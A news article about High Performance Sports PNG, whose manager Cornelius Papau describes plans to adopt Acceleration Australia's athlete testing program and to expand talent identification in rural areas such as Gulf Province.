HP PREPARING OUR ATHLETES RARING TO GO

Cornelius Papau is the Manager of the High Performance Sports PNG Organisation, a subsidiary arm of the PNG Sports Foundation and functions as an office that is aimed at preparing athletes to both elite international and local sports meets ticking off representative duties by the participating athletes. Talent identification, sports science, sports medicine, data analytics, sports nutrition and sports psychology are just some of the arms of HP Sports PNG and caters to the elite athletes. From a recent trip to Hong Kong and Australia, Papau, has identified tools and systems that can be used to tailor the athletes preparations based on their performance goals in trying to emulate past performances. One such organisation that HP Sports PNG has reached out to is Acceleration Australia, an organisation that develops athletes who wish to improve training and performance outcomes based on screening and interval testing work done with speed and agility, and strength and power, all of which are crucial to the overall athlete performance. Papau is keen to integrate the Acceleration performance analysis program to collect more accurate information in the hope of tailoring the correct individual and team training to meet performance indicators.

Recent visits to the Gulf Province has slated many talented athletes in the province for greater things, particularly in the absence of such programs that do go to the rural areas in search of the much need talent base to select the best from. “I believe there is a lot of talented sporting athletes in the country but given the limitations we have, there is not enough exposure for the talent to grow and our visit to Gulf Province was certainly and eye-opener where we were able to identify the athletes that have the potential to represent PNG in their chosen sports”, Papau said. He added that there is a big need for talent identification programs to be rolled out in the rural areas through the existing sporting bodies and national federations to establish the talent base and continue the development work for the roll on of athletes within in each community.
